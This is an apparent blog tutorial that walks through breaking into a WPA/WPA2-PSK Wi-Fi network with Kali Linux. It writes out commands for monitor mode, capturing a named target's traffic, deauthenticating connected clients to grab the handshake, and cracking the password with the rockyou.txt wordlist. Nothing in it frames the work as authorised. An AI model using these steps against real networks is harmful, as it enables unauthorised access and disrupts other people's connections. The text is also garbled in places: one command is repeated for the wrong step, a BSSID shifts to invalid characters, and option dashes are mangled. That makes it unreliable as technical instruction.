Get Into Wi-Fi networks using Kali Linux And Airmon-ng WPA, WPA2-PSK

22:24:00
For hacking a Wi-Fi network you have to deal with kali OS & Airmon-ng .

Here are the steps:
1.Identify the wireless network interface.Type in terminal “ifconfig” and press enter.

2.⦁ For hacking a Wi-Fi network you need to enable Moniter Mode.For that,Turn on the Monitoring mode.Type in terminal “airmon-ng start wlan0” and press enter.


3. From the above image, mine monitoring wireless card name is “wlan0mon”. Now I am Scanning the wireless networks .Type in terminal “airmon-ng start wlan0” and press enter

Now we have to dump the data for that Type in the terminal “airodump-ng wlan0mon” and press enter.

4.From the above image we will use the following things:
⦁ Essid of the router : W4rL0cK.1N
⦁ Bssid of the router : 00:1E:A6:05:E5:A4
⦁ Channel number : 13
⦁ File name to write : wireless
⦁ Press “ctrl+z” when you get the sufficient data to hack the wireless.
5. As my target is W4rL0cK.1N,I will now capture the packets of this Device. For Capturing the packets on the Access Points,Type in terminal “airodump-ng –bssid 00:1R:A6:05:R5:A4 –c 13 –w wireless wlan0mon” and press enter.
⦁ Let it run in a separate terminal. Don’t close this terminal.
6.Just to capture the handshake,here i am going for de-authenticate.
Sending de-authenticate packets to the clients to make them disconnect and connect again to the access points.
Open a new terminal and type “aireplay-ng --deauth 10 -a 00:1E:A6:05:E5:A4 -h 3C:91:57:36:36:D2 wlan0mon” and press enter.
After completing the de-authentication process the client will be disconnected from the access point and reconnects and which will share a password with each other.
7.When you de-authenticate the client in the 2nd terminal. Make sure to check for “WPA Handshake : 00:1R:A6:05:TT:3A” at the top right of the 1st terminal.

⦁ Now that you have a handshake in the captured file. Let’s crack it with the aircrack-ng.
⦁ Close every terminal that you are running before apart from a single terminal.
8. ⦁ Type in the terminal “aircrack-ng wireless-01.cap -w rockyou.txt” and press enter.

⦁ We used a dictionary for cracking WPA2 passwords name rockyou.txt and successfully cracked the password of the Wi-Fi which is “qwertyuiop”.
and your wifi network is ready to connect :)

0 comments

Do Not Miss

Career file for NFS- All blacklist opened